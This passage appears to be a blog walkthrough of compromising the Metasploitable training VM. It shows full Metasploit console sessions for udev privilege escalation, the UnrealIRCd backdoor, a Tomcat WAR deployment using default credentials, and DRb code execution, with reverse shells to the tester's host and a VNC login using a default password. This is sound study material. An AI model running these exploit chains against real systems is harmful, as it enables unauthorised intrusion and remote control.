From here we again have to elevate our privileges. I will exploit the same vulnerability with the udev exploit, but this time from inside Metasploit:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37

meterpreter > background [*] Backgrounding session 1... msf exploit(postgres_payload) > use exploit/linux/local/udev_netlink msf exploit(udev_netlink) > show options Module options (exploit/linux/local/udev_netlink): Name Current Setting Required Description ---- --------------- -------- ----------- NetlinkPID no Usually udevd pid-1. Meterpreter sessions will autodetect SESSION yes The session to run this module on. WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) Exploit target: Id Name -- ---- 0 Linux x86 msf exploit(udev_netlink) > set SESSION 1 SESSION => 1 msf exploit(udev_netlink) > exploit [*] Started reverse handler on 192.168.127.159:4444 [*] Attempting to autodetect netlink pid... [*] Meterpreter session, using get_processes to find netlink pid [*] udev pid: 2770 [+] Found netlink pid: 2769 [*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb [*] Writing exploit executable (1879 bytes) to /tmp/DQDnKUFLzR [*] chmod'ing and running it... [*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:33383) at 2014-06-06 23:03:13 +0300 whoami root

So, the same exploit that I manually used earlier was very easy and quick in Metasploit. Onwards!

Port 5900 vnc

The Nessus scan reported that the server is using the password ‘password’. So I will use vncviewer to connect to it:

1 2 3 4 5 6 7 8 9 10 11 12 13 14

vncviewer 192.168.127.154 Connected to RFB server, using protocol version 3.3 Performing standard VNC authentication Password: Authentication successful Desktop name "root's X desktop (metasploitable:0)" VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

And we have another root shell.

Port 6667 irc

An exploit is available for this:
UnrealIRCD 3.2.8.1 Backdoor Command Execution

This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(unreal_ircd_3281_backdoor) > show options Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 6667 yes The target port Exploit target: Id Name -- ---- 0 Automatic Target msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154 RHOST => 192.168.127.154 msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse payload => cmd/unix/reverse msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.127.159 LHOST => 192.168.127.159 msf exploit(unreal_ircd_3281_backdoor) > exploit [*] Started reverse double handler [*] Connected to 192.168.127.154:6667... :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead [*] Sending backdoor command... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo qcHh6jsH8rZghWdi; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "qcHh6jsH8rZghWdi\r\n" [*] Matching... [*] A is input... [*] Command shell session 3 opened (192.168.127.159:4444 -> 192.168.127.154:41975) at 2014-06-06 23:31:44 +0300 whoami root

Port 8180 tomcat

First, let’s see what information we can get using the Tomcat Administration Tool Default Access module:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

msf > use auxiliary/admin/http/tomcat_administration msf auxiliary(tomcat_administration) > show options Module options (auxiliary/admin/http/tomcat_administration): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOSTS yes The target address range or CIDR identifier RPORT 8180 yes The target port THREADS 1 yes The number of concurrent threads TOMCAT_PASS no The password for the specified username TOMCAT_USER no The username to authenticate as VHOST no HTTP server virtual host msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154 RHOSTS => 192.168.127.154 msf auxiliary(tomcat_administration) > run [*] http://192.168.127.154:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat] [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

With credentials in hand, now we can use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit:

This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in > this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53

msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > show options Module options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no Use a proxy chain RHOST yes The target address RPORT 80 yes The target port USERNAME no The username to authenticate as VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat PASSWORD => tomcat msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 RHOST => 192.168.127.154 msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat USERNAME => tomcat msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat PASSWORD => tomcat msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 RHOST => 192.168.127.154 msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat USERNAME => tomcat msf exploit(tomcat_mgr_deploy) > set RPORT 8180 RPORT => 8180 msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159 LHOST => 192.168.127.159 msf exploit(tomcat_mgr_deploy) > exploit [*] Started reverse handler on 192.168.127.159:8888 [*] Attempting to automatically select a target... [*] Automatically selected target "Linux x86" [*] Uploading 13833 bytes as RuoE02Uo7DeSsaVp7nmb79cq.war ... [*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp... [*] Undeploying RuoE02Uo7DeSsaVp7nmb79cq ... [*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2014-06-06 23:51:01 +0300 whoami tomcat55

We can elevate our privileges using the udev exploit from earlier, so I won’t go over it again.

Port 8787 drb

First I wanted to know what this drb is, since I wasn’t familiar with it.

Distributed Ruby or DRb allows Ruby programs to communicate with each other on the same machine or over a network. DRb uses remote method invocation (RMI) to pass commands and data between processes (Wikipedia)

Then I searched in Metasploit for an exploit, and luckily, I got a hit:
Distributed Ruby Send instance_eval/syscall Code Execution

This module exploits remote code execution vulnerabilities in dRuby

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44

msf > use exploit/linux/misc/drb_remote_codeexec msf exploit(drb_remote_codeexec) > show options Module options (exploit/linux/misc/drb_remote_codeexec): Name Current Setting Required Description ---- --------------- -------- ----------- URI yes The dRuby URI of the target host (druby://host:port) Exploit target: Id Name -- ---- 0 Automatic msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787 URI => druby://192.168.127.154:8787 msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse payload => cmd/unix/reverse msf exploit(drb_remote_codeexec) > set LHOST 192.168.127.159 LHOST => 192.168.127.159 msf exploit(drb_remote_codeexec) > exploit [*] Started reverse double handler [*] trying to exploit instance_eval [*] instance eval failed, trying to exploit syscall [-] Exploit failed: Errno::EINVAL Invalid argument [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 7Kx3j4QvoI7LOU5z; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "7Kx3j4QvoI7LOU5z\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:35889) at 2014-06-08 16:51:56 +0300 whoami root

Another port, another shell!
This turned out to be a a very lengthy post. There were some ports I couldn’t find an exploit for, so can’t determine if the underlying services were exploitable or not. Overall, owning Metasploitable in multiple ways and documenting it was the goal of this post.